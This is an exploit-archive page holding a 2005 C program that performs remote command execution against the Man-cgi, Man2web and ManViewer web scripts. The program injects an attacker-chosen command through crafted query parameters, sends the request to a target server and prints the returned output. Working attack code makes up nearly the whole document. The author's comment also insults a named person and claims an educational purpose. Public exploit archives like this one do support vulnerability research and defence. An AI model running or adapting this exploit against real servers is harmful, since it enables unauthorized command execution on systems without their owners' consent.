exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

dl-mancgi.c

dl-mancgi.c
Posted Sep 7, 2005
Authored by tracewar

Man-cgi/Man2web/ManView remote command execution exploit. Tested against Man-cgi 1.11. All versions are affected.

tags | exploit, remote, cgi
SHA-256 | 3300bb4e9b0b107c205b3358667f3e44b2322107d91b974768b345a5d6beebc5

dl-mancgi.c

Change Mirror Download
/*
Multipie man-2-web cgi scripts reomte command execution exploit
Exploit coded and bugs found by tracewar of DarkLogic.

Greetings goes to:
Matan Peretz - Lijojon :-)
Ofer Shaked
setuid
alex
majestic - do I know you ?
Yacha - Peace.

Special greetings to crazy cookie my perfect girlfriend..
Oh yea and a tiny piece of crap goes to [maorbn], dude you suck get some skills loser ;x

I don't take any responsibility of what this code may do -
the only reason i release this code is for educaional purposes!

*/

#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

void usage(char *argv0) {
fprintf(stderr, "[PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE]\n");
fprintf(stderr, "Man-cgi/Man2web/ManViewer Remote Command Execution Exploit\n");
fprintf(stderr, "Exploit coded and bugs found by tracewar of DarkLogic\n");
fprintf(stderr, "tested against:\n[+] Man-cgi 1.11 on RedHat Enterprise Linux AS release 3 (Taroon Update 4)\n");
fprintf(stderr, "[+] Man2web (ALL VERSIONS) - little problem with the cleanup fix it yourself, short \
commands problem\n");
fprintf(stderr, "[+] ManViewer (ALL VERSIONS) - Limited commands\n");
fprintf(stderr, "usage: %s <remote_host> <command> <path> <http server port> <target>\n", argv0);
fprintf(stderr, "targets: 0=Man-cgi 1=man2web 2=Man2html\n");
fprintf(stderr, "[PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE] [PRIVATE]\n");
exit(0);
}

int main(int argc, char **argv) {
int sock, i, j;
struct sockaddr_in serv_addr;
struct hostent *crap;
char *cp, dummy[50000], buffer[2000] = "GET "; /*
Dummy is huge for the recv() later,
I could've used a pointer and malloc everytime
the while() loop did the trick ;x
You can call me lazy :-)
*/

if(argc < 6)
usage(argv[0]);

if(atoi(argv[5]) == 0) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");
}
else if(atoi(argv[5]) == 1) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?program=-P ");
strcat(dummy, argv[2]);
strcat(dummy, " ls");
}
else if(atoi(argv[5]) == 2) {
memset(dummy, 0x00, 50000);
strcat(dummy, argv[3]);
strcat(dummy, "?section=-P");
strcat(dummy, argv[2]);
strcat(dummy, "&topic=w");
}
else
usage(argv[0]);

printf("[+] Made our evil buffer switching spaces with %20 and requesting..\n");
for(i=0, j=4;i < strlen(dummy);i++) {
if(dummy[i] == ' ') {
strcat(buffer, "%20");
j+=3;
}
else {
buffer[j] = dummy[i];
j++;
}
}

strcat(buffer, "\r\n");

sock = socket(AF_INET, SOCK_STREAM, 0);
if(sock < 0)
return printf("[-] Error creating socket.\n");
crap = gethostbyname(argv[1]);
if(crap == NULL)
return printf("[-] Cant resolve the specified hostname: %s\n", argv[1]);
else
printf("[+] Resolved the remote hostname, connecting...\n");

serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(atoi(argv[4]));
bcopy((char *)crap->h_addr, (char *)&serv_addr.sin_addr.s_addr, crap->h_length);

if (connect(sock, &serv_addr, sizeof(serv_addr)) < 0)
return printf("[-] Error connecting to %s:%d\n", argv[1], atoi(argv[3]));

printf("[+] Connected! sending our evil request... ");
if( (send(sock, buffer, strlen(buffer), 0)) == -1 )
return printf("\n[-] Error sending the evil request :(\n");
printf("Sent!\n");
printf("[+] Waiting for the server answer...\n");
memset(buffer, 0x00, 2000);
memset(dummy, 0x00, 50000);
printf("[+] Got:\n\n");
while(recv(sock, buffer, 2000, 0) > 0)
strcat(dummy, buffer);

cp = &dummy[0];
i = 0;

/*
Bahhh this filtering sucks ass, you can clean this alot
*/

if(atoi(argv[5]) == 0) {
while(strncmp(cp, "<hr>", 4)) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "<hr>", 4) && strncmp(cp, "<A", 2))
cp++;
*cp = '\0';
cp = &dummy[0] + i + 4;
}

else if(atoi(argv[5]) == 1) {
while(strncmp(cp, "\<pre\>", 5)) {
cp++;
i++;
}
cp+=4;
while(strncmp(cp, "pre", 3))
cp++;
*cp = '\0';
cp = &dummy[0] + i + 6;
}

else if(atoi(argv[5]) == 2) {
while(strncmp(cp, "PRE", 3)) {
cp++;
i++;
}
cp+=2;
while(strncmp(cp, "PRE", 3))
cp++;
*cp = '\0';
cp = &dummy[0] + i + 2;
}

printf("%s", cp);
printf("\n\n");
printf("[+] Good Bye!\n");
close(sock);
return 0;
}
Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close